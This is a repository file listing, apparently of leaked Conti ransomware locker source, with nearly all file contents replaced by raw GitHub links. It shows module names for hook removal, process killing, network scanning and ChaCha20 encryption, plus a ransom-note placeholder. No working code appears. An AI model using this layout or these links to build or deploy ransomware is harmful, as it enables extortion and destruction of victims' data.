-------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/locker.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /locker/Release/locker.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/locker.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /locker/Release/locker.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/locker.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /locker/Release/locker.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/locker.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /locker/Release/locker.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/locker.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /locker/Release/locker.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/locker.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /locker/Release/locker.tlog/locker.lastbuildstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/locker.tlog/locker.lastbuildstate -------------------------------------------------------------------------------- /locker/Release/locker.vcxproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /locker/Release/logs.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/logs.obj -------------------------------------------------------------------------------- /locker/Release/main.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/main.obj -------------------------------------------------------------------------------- /locker/Release/memory.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/memory.obj -------------------------------------------------------------------------------- /locker/Release/network_scanner.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/network_scanner.obj -------------------------------------------------------------------------------- /locker/Release/process_killer.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/process_killer.obj -------------------------------------------------------------------------------- /locker/Release/search.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/search.obj -------------------------------------------------------------------------------- /locker/Release/threadpool.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/threadpool.obj -------------------------------------------------------------------------------- /locker/Release/vc140.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/vc140.pdb -------------------------------------------------------------------------------- /locker/antihook/CONTI.txt: -------------------------------------------------------------------------------- 1 | TEST -------------------------------------------------------------------------------- /locker/antihook/antihooks.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/antihook/antihooks.cpp -------------------------------------------------------------------------------- /locker/antihook/antihooks.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | VOID removeHooks(HMODULE hmodule); -------------------------------------------------------------------------------- /locker/api.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/api.cpp -------------------------------------------------------------------------------- /locker/api.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/api.h -------------------------------------------------------------------------------- /locker/chacha20/CONTI.txt: -------------------------------------------------------------------------------- 1 | TEST -------------------------------------------------------------------------------- /locker/chacha20/R3ADM3.txt: -------------------------------------------------------------------------------- 1 | __DECRYPT_NOTE__ -------------------------------------------------------------------------------- /locker/chacha20/chacha.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/chacha20/chacha.c -------------------------------------------------------------------------------- /locker/chacha20/chacha.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/chacha20/chacha.h -------------------------------------------------------------------------------- /locker/chacha20/ecrypt-config.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/chacha20/ecrypt-config.h -------------------------------------------------------------------------------- /locker/chacha20/ecrypt-machine.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/chacha20/ecrypt-machine.h -------------------------------------------------------------------------------- /locker/chacha20/ecrypt-portable.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/chacha20/ecrypt-portable.h -------------------------------------------------------------------------------- /locker/chacha20/ecrypt-sync.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/chacha20/ecrypt-sync.h -------------------------------------------------------------------------------- /locker/common.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/common.h -------------------------------------------------------------------------------- /locker/disks.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/disks.cpp -------------------------------------------------------------------------------- /locker/filesystem.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/filesystem.h -------------------------------------------------------------------------------- /locker/global_parameters.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/global_parameters.cpp -------------------------------------------------------------------------------- /locker/global_parameters.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/global_parameters.h -------------------------------------------------------------------------------- /locker/hash.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/hash.cpp -------------------------------------------------------------------------------- /locker/hash.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/hash.h -------------------------------------------------------------------------------- /locker/locker.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/locker.cpp -------------------------------------------------------------------------------- /locker/locker.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/locker.h -------------------------------------------------------------------------------- /locker/locker.vcxproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/locker.vcxproj -------------------------------------------------------------------------------- /locker/locker.vcxproj.filters: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/locker.vcxproj.filters -------------------------------------------------------------------------------- /locker/locker.vcxproj.user: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/locker.vcxproj.user -------------------------------------------------------------------------------- /locker/logs.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/logs.cpp -------------------------------------------------------------------------------- /locker/logs.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/logs.h -------------------------------------------------------------------------------- /locker/main.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/main.cpp -------------------------------------------------------------------------------- /locker/memory.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/memory.cpp -------------------------------------------------------------------------------- /locker/memory.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/memory.h -------------------------------------------------------------------------------- /locker/network_scanner.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/network_scanner.cpp -------------------------------------------------------------------------------- /locker/network_scanner.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/network_scanner.h -------------------------------------------------------------------------------- /locker/ntdll.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/ntdll.h -------------------------------------------------------------------------------- /locker/process_killer.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/process_killer.cpp -------------------------------------------------------------------------------- /locker/process_killer.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/process_killer.h -------------------------------------------------------------------------------- /locker/queue.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/queue.h -------------------------------------------------------------------------------- /locker/search.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/search.cpp -------------------------------------------------------------------------------- /locker/threadpool.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/threadpool.cpp -------------------------------------------------------------------------------- /locker/threadpool.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/threadpool.h --------------------------------------------------------------------------------